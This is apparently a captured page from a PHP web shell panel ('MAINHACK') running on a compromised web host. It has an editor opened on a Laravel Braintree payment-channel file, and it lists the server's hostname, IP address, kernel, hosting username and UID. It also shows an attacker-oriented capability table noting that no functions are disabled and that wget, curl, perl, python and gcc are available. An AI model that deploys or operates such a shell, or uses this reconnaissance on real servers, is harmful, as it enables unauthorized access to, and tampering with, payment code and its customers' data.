[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Channel.php
<?php namespace App\PaymentChannels\Drivers\Braintree; use App\Models\Order; use App\Models\PaymentChannel; use App\PaymentChannels\BasePaymentChannel; use App\PaymentChannels\IChannel; use Illuminate\Http\Request; use Omnipay\Omnipay; class Channel extends BasePaymentChannel implements IChannel { protected $currency; protected $test_mode; protected $merchant_id; protected $public_key; protected $private_key; protected array $credentialItems = [ 'merchant_id', 'public_key', 'private_key', ]; /** * Channel constructor. * @param PaymentChannel $paymentChannel */ public function __construct(PaymentChannel $paymentChannel) { $this->currency = currency(); $this->setCredentialItems($paymentChannel); } protected function makeGateway() { $gateway = Omnipay::create('Braintree'); $gateway->setMerchantId($this->merchant_id); $gateway->setPublicKey($this->public_key); $gateway->setPrivateKey($this->private_key); $gateway->setTestMode($this->test_mode); return $gateway; } /** * @throws \Exception */ public function paymentRequest(Order $order) { // Send purchase request try { $gateway = $this->makeGateway(); $reqData = $this->createPaymentData($order); $reqData['token'] = $gateway->clientToken()->send()->getToken(); $response = $gateway->purchase($reqData)->send(); } catch (\Exception $exception) { // dd($exception); throw new \Exception($exception->getMessage(), $exception->getCode()); } if ($response->isRedirect()) { return $response->redirect(); } $toastData = [ 'title' => trans('cart.fail_purchase'), 'msg' => '', 'status' => 'error' ]; return redirect()->back()->with(['toast' => $toastData])->withInput(); } private function createPaymentData($order) { $generalSettings = getGeneralSettings(); $user = $order->user; $card = [ 'email' => $user->email ?? $generalSettings['site_email'], 'billingFirstName' => $user->full_name, 'billingLastName' => '', 'billingPhone' => $user->mobile, 'billingCompany' => $generalSettings['site_name'], 'billingAddress1' => '', 'billingCity' => '', 'billingPostcode' => '', 'billingCountry' => '', ]; return [ 'transactionId' => $order->id, 'amount' => $this->makeAmountByCurrency($order->total_amount, $this->currency), 'currency' => $this->currency, 'testMode' => $this->test_mode, 'returnUrl' => $this->makeCallbackUrl($order, 'success'), 'cancelUrl' => $this->makeCallbackUrl($order, 'cancel'), 'notifyUrl' => $this->makeCallbackUrl($order, 'notify'), 'card' => $card, ]; } private function makeCallbackUrl($order, $status) { return url("/payments/verify/Braintree?status=$status&order_id=$order->id"); } public function verify(Request $request) { $data = $request->all(); $order_id = $data['order_id']; $user = auth()->user(); $order = Order::where('id', $order_id) ->where('user_id', $user->id) ->first(); if (!empty($order)) { $orderStatus = Order::$fail; // Setup payment gateway try { $gateway = $this->makeGateway(); $reqData = $this->createPaymentData($order); $reqData['token'] = $gateway->clientToken()->send()->getToken(); $response = $gateway->purchase($reqData)->send(); } catch (\Exception $exception) { //dd($exception); throw new \Exception($exception->getMessage(), $exception->getCode()); } if ($response->isSuccessful()) { $orderStatus = Order::$paying; } $order->update([ 'status' => $orderStatus ]); } return $order; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285